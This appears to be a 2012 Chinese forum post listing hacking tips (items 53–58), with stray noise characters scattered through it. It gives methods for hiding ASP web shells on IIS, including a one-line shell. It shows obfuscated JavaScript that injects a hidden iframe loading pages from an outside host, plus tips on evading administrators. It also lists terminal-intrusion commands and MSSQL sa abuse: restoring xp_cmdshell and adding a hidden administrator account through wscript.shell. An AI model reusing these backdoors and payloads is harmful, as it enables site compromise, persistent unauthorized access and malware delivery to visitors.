% m% X& l6 b, E$ Y4 `8 h1 K用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。2 B0 l0 e2 V4 N6 M
& Q3 u" h/ U2 i4 S0 O53、隐藏ASP后门的两种方法6 G. Q' R1 P5 z. d A& c- m
1、建立非标准目录:mkdir images..\* p4 S/ {4 H5 z3 L) ~+ h, }# U
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp, Y W( x& V. h' k9 J
通过web访问ASP木马:http://ip/images../news.asp?action=login9 E+ R" V7 {' N. v
如何删除非标准目录:rmdir images..\ /s3 u' g, Y* K2 z! j6 o! c d# p
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:$ u1 _- I* B4 j$ B& X7 L
mkdir programme.asp
, \$ B: B! V8 M" k" O- ~新建1.txt文件内容:<!--#include file=”12.jpg”-->8 X( n m- o9 |% c6 |
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
9 R/ |$ O; A# o7 S& t: e6 }attrib +H +S programme.asp
, u5 V1 w1 q0 m5 A `通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
, p" d( e# t9 T( A7 a
) ?* A$ N' u# u% z* _: G54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
. }# t6 `( l' _! b+ H' ^, t. v然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
5 l4 D V+ P( W! f& R0 P+ P5 u" K0 R7 R& Y
55、JS隐蔽挂马& n6 J4 G% q$ b2 `1 N* T4 s% k, ^
1.
, Y' b' m {4 M. N$ m/ k& P- ]( ^var tr4c3="<iframe src=ht";# N* d+ O) D* c3 j
tr4c3 = tr4c3+"tp:/";/ P1 P+ ]' |" R! N$ o
tr4c3 = tr4c3+"/ww";% u; {1 ^# ~. A) ^8 V
tr4c3 = tr4c3+"w.tr4";
_1 |( h7 k9 ctr4c3 = tr4c3+"c3.com/inc/m";8 G# n- I9 P: ~% Y8 Y: D; X2 J
tr4c3 = tr4c3+"m.htm style="display:none"></i";# B7 r/ C9 l5 Q2 T {/ h) [& M
tr4c3 =tr4c3+"frame>'";
1 F+ d9 `5 R/ ?document.write(tr4c3);2 Q. ^; y1 E) F
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。 B* r4 e' M/ U0 w
' d; r; E( B" b6 U* C
2.- X* Y2 z# ]* M8 H4 M- |6 F
转换进制,然后用EVAL执行。如
( R: T! J" V; r$ e( Y6 \ P0 ?( y5 ~eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");2 z6 }- `; x0 H! V, p
不过这个有点显眼。
. x8 m" o7 ]1 B# U2 \3.
) U4 h( U+ b* W( sdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
* A4 @, ~- C8 ~( p最后一点,别忘了把文件的时间也修改下。: U4 A4 b6 r8 w6 F1 J
2 j: z: @# s% N6 r1 B/ |56.3389终端入侵常用DOS命令
8 S/ i4 I. \0 V7 w# vtaskkill taskkill /PID 1248 /t6 @* P2 y; x x- x5 T
U: i- ?+ d& m8 @. o) Jtasklist 查进程( o9 ^3 Q( ?0 n: d' r
# m9 J% ^0 a6 U/ Wcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限* D ~ L k/ q7 A% y
iisreset /reboot: ]1 w, P- S. ^- w, v) m7 _9 x% x
tsshutdn /reboot /delay:1 重起服务器: s8 X- D2 p) K$ l, ~
* e4 t5 B8 B, G( D. ilogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
1 X* b& W# \2 W" H$ J- L2 N
; G9 [4 F# Z X- wquery user 查看当前终端用户在线情况( {% Y' `' D- l7 O1 w
3 s. h2 D2 E5 c5 E2 d* m0 k; h要显示有关所有会话使用的进程的信息,请键入:query process *" q$ o& a: E2 T3 k* `, p
; o& C; @" }: G6 l1 K1 ~
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
/ p( {( C- h5 }# y' g( o* u
! e; @7 L6 L, I0 p& g0 R要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2' o+ c8 l L8 ?% g0 l
. j" U7 y; S6 a* b1 L6 p, ~! {
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
}5 u$ @1 F& I" K. V7 {
/ m) t( [, R5 R- ?7 T/ l命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启9 ^. Y& T5 `7 q% I- }" Q
$ c* C1 a7 F$ S
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统( \9 E S7 H- e" V# ~
" Q# _# T0 E: Q# X; m
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。/ E- q) V! M" C! x/ W/ }/ z
- b$ N, D1 Q- }( Z& g& W命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
9 n3 P) e, b; e4 j7 _4 k8 i2 B7 u0 S' I
56、在地址栏或按Ctrl+O,输入:) E5 {: I# W# S/ K+ o: q: \
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;6 P3 ~# b1 `1 `5 O B* i0 B+ e
8 G7 b# [1 K7 M/ k: K; a5 ~1 I源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。) r9 E% w* C" b; o
6 {! v, k* S+ A f- z9 h1 K8 `57、net user的时候,是不能显示加$的用户,但是如果不处理的话,( _, A1 A G: s' Y1 M- B* z: f
用net localgroup administrators是可以看到管理组下,加了$的用户的。
! U% P3 k$ f* t( S, a9 R: T! c" x! d$ B* \0 J) ^; _5 G; Z
58、 sa弱口令相关命令; Q3 @' n% M3 ?- C( Q* c
6 u. k5 r1 `+ @! Z+ H( E. \一.更改sa口令方法:% D2 ^; A# |; I% |
用sql综合利用工具连接后,执行命令:
, i* D. u1 @) i$ @exec sp_password NULL,'20001001','sa'! O. ?( {, g7 V& o
(提示:慎用!)! i% V, X$ \: { H- o* z
, m4 Q& J' |. p二.简单修补sa弱口令.
+ N& q$ C1 ]; |9 _' U! V) s+ W" V1 O3 [( c
方法1:查询分离器连接后执行:" V/ d a1 d: k, C% }
if exists (select * from
5 O9 N; z9 x; B; zdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and/ V3 A7 V' Y( L. @! |6 z8 A
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
3 t$ W/ ^8 W; h! Q4 n" j$ w- |2 l. @5 u/ O
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
5 L4 }" r" b1 |- h% G5 o9 q& O( p; u+ k
GO" M3 w, R9 k/ ^+ s7 R. L+ q2 \
) t% E: M) {, Y: }然后按F5键命令执行完毕- w6 |3 t$ S: N% k1 n9 d1 h2 ~% s
, k4 w$ V' c* \0 @3 k3 Y; }# u+ _! w4 I
方法2:查询分离器连接后
, i$ i) L. d+ z3 @* c3 G! g; q第一步执行:use master) ]% A+ ?* t# e
第二步执行:sp_dropextendedproc 'xp_cmdshell', @; g4 S x# m) I, o
然后按F5键命令执行完毕( L# }# l& f% @' x, q! s. h
" K! @% L! e4 n5 v& V7 ]
! Z# R: P7 i& ]+ l/ P; z* i三.常见情况恢复执行xp_cmdshell.
2 J {8 W6 ] ]0 L; K/ s0 A5 t9 I$ D% L
1 F; L" f0 `+ A' `6 y* q
1 未能找到存储过程'master..xpcmdshell'.0 P' l3 c' d2 v, ?7 `8 C
恢复方法:查询分离器连接后,
5 Y {) b) l' \9 J* g第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int, u& x) C s! K: ?$ w$ R% [- f
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 z8 E5 G4 ~% v+ ]$ R
然后按F5键命令执行完毕
$ d% R0 P4 f) z' ^$ _: n
; x% t2 a7 K$ v6 i) h) A2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。): I6 R7 l! C! t2 M
恢复方法:查询分离器连接后,
9 `. |6 x! ?9 p/ Y第一步执行:sp_dropextendedproc "xp_cmdshell"* X6 I5 p0 |; V- k# ~
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'5 c# U9 o. Z; o
然后按F5键命令执行完毕
. r0 [( w: T- G5 ~0 B; \% ?
9 a* r) ~1 t5 A5 z0 |3 N9 P3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)6 |/ p) m( ~3 ?
恢复方法:查询分离器连接后,: D$ [2 N' F1 w2 T( I
第一步执行:exec sp_dropextendedproc 'xp_cmdshell', l2 d6 B- o5 J" w3 D
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
; b ^- S1 s: j: a$ o6 Y3 I1 |然后按F5键命令执行完毕
: I' o R9 }& |
/ B# }/ E k8 o" C+ K' m四.终极方法.5 F7 F$ ]+ Q, ^- U- ~
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:- g! @( f$ j! T2 N
查询分离器连接后,
. h' A' e/ W$ M3 `# R/ Z2000servser系统:: y( i7 \, h9 p p% ~/ q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'8 u5 x1 d: o( }4 B
: j9 q+ b% S2 q7 Q& H4 G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
8 D+ R W3 L- B! a
, ^1 e9 y% i2 g( ~xp或2003server系统:
/ Y" V8 |2 ^! ^) i' z: P6 C( p
) X/ i1 q' B! o& ~% Ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'* j* p( z$ ?0 v8 n9 S. @+ M
" l D y" o/ f6 q" A' b, e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
8 z. c4 K8 E# W; ~' _ |
发表于 2012-9-15 14:51:03
收藏
支持
反对